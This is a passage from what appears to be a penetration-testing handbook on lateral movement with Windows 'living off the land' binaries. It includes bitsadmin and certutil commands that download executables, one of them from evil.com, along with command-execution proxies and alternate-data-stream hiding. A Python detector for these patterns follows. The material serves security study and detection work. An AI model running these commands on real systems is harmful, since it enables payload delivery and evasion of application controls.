6.1.5. Lateral movement

6.1.5.1. Common Entry

  • SMB weak passwords

  • SqlServer weak passwords

6.1.5.2. LOLBAS

6.1.5.2.1. Introduction

LOLBAS, short for Living Off The Land Binaries and Scripts (and also Libraries), is a technique that abuses trusted (whitelisted) binaries. The concept was discovered by Christopher Campbell and Matt Graeber in 2013 and finally proposed by Philip Goh.

These programs are generally signed by Microsoft or by third-party certification authorities, but beyond their normal functions they can also be abused for intranet penetration. Such programs may be used to download malicious programs, execute malicious code, bypass UAC, bypass application control, etc.

6.1.5.2.2. Common programs

  • SyncAppvPublishingServer.exe
    • Execute PowerShell

  • bitsadmin.exe
    • download file: bitsadmin /transfer <job_name> /priority <priority> <remote_path> <local_path>

    • download file (step by step):
      bitsadmin /create 1
      bitsadmin /addfile 1 https://evil.com/autoruns.exe c:\data\playfolder\autoruns.exe
      bitsadmin /RESUME 1
      bitsadmin /complete 1

    • copy file:
      bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /RESUME 1 & bitsadmin /Complete 1 & bitsadmin /reset

    • code execution (a command is run when the job completes):
      bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\cmd.exe NULL & bitsadmin /RESUME 1 & bitsadmin /Reset

  • cdb.exe

  • certutil.exe
    • Certificates can be installed, backed up, deleted, managed and executed

    • Certificate store related functions

    • download file: certutil -urlcache -split -f https://addr/example.exe

    • Note that certutil keeps a cache of downloaded content, which is only removed when deleted explicitly

    • base64 encode/decode: certutil -encode / certutil -decode

  • cmd.exe

  • cmstp.exe

  • control.exe

  • csc.exe
    • Compile the C# payload

  • cscript.exe
    • execute script

  • extexport.exe

  • expand.exe
    • Expand one or more compressed files

  • forfiles.exe
    • run a command for each matching file: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe

  • mofcomp.exe

  • makecab.exe

  • msbuild.exe
    • Build the app

  • mshta.exe
    • HTML application

  • msiexec.exe
    • install msi

    • loading dll

  • msxsl.exe
    • Process XSL programs

  • netsh.exe

  • installutil.exe
    • Install/uninstall program components

  • IEExec.exe
    • .NET Framework utility program

  • powershell.exe

  • psexec.exe

  • reg.exe
    • Registry Console

  • regedit.exe
    • Registry modification

  • regsvr32.exe
    • Register dynamic link library/ActiveX control

  • rundll32.exe
    • Execute internal functions in DLL files

  • sc.exe
    • View and manage service status

  • schtasks.exe
    • Scheduled tasks

  • shred
    • Repeatedly overwrite files to hinder file recovery

  • type.exe
    • Hide a file in an alternate data stream (ADS): type <filepath> > <target_file>:<ads>

  • wmic.exe
    • Windows Management Instrumentation command-line tool

  • windbg.exe

  • winrm.exe

  • wscript.exe
    • script engine

  • waitfor.exe
    • Used to synchronize computers across a network; it can send or wait for signals on the system.
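As an added defensive example (not code from the original page), the following Python flags the bitsadmin, certutil and forfiles invocation patterns listed above when they appear in process-creation events, while leaving ordinary uses of the same binaries alone; the events, field names and rule texts are constructed for illustration.

```python
import re

# Constructed process-creation events (hypothetical sample data, not from a real host).
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\bitsadmin.exe", "user": "CORP\\alice",
     "cmdline": r"bitsadmin /addfile 1 https://evil.com/autoruns.exe c:\data\playfolder\autoruns.exe"},
    {"image": r"C:\Windows\System32\bitsadmin.exe", "user": "CORP\\alice",
     "cmdline": r"bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\cmd.exe NULL"},
    {"image": r"C:\Windows\System32\certutil.exe", "user": "CORP\\bob",
     "cmdline": r"certutil -urlcache -split -f https://addr/example.exe"},
    {"image": r"C:\Windows\System32\certutil.exe", "user": "CORP\\bob",
     "cmdline": r"certutil -store My"},                # benign: list a certificate store
    {"image": r"C:\Windows\System32\forfiles.exe", "user": "CORP\\carol",
     "cmdline": r"forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe"},
    {"image": r"C:\Windows\System32\bitsadmin.exe", "user": "CORP\\dave",
     "cmdline": r"bitsadmin /list /allusers"},         # benign: list existing BITS jobs
]

# Detection rules: (binary name, case-insensitive regex over the command line, finding text).
# Each pattern corresponds to one of the LOLBAS usages listed on this page.
RULES = [
    ("bitsadmin.exe", r"/addfile\s+\S+\s+https?://", "BITS job used to download a remote file"),
    ("bitsadmin.exe", r"/setnotifycmdline\s", "BITS job configured to run a command on completion"),
    ("certutil.exe", r"-urlcache\b.*-f\s+https?://", "certutil used as a downloader"),
    ("certutil.exe", r"-(en|de)code\b", "certutil used as a base64 codec"),
    ("forfiles.exe", r"/c\s+", "forfiles used as a command-execution proxy"),
]


def match_rules(event):
    """Return the finding text of every rule whose binary and pattern match this event."""
    image = event["image"].rsplit("\\", 1)[-1].lower()   # keep only the file name
    return [finding for binary, pattern, finding in RULES
            if binary == image and re.search(pattern, event["cmdline"], re.IGNORECASE)]


def triage(events):
    """Return (event index, user, finding) for every event that matches at least one rule."""
    hits = []
    for i, ev in enumerate(events):
        for finding in match_rules(ev):
            hits.append((i, ev["user"], finding))
    return hits


if __name__ == "__main__":
    for idx, user, finding in triage(SAMPLE_EVENTS):
        print(f"event {idx} ({user}): {finding}")
```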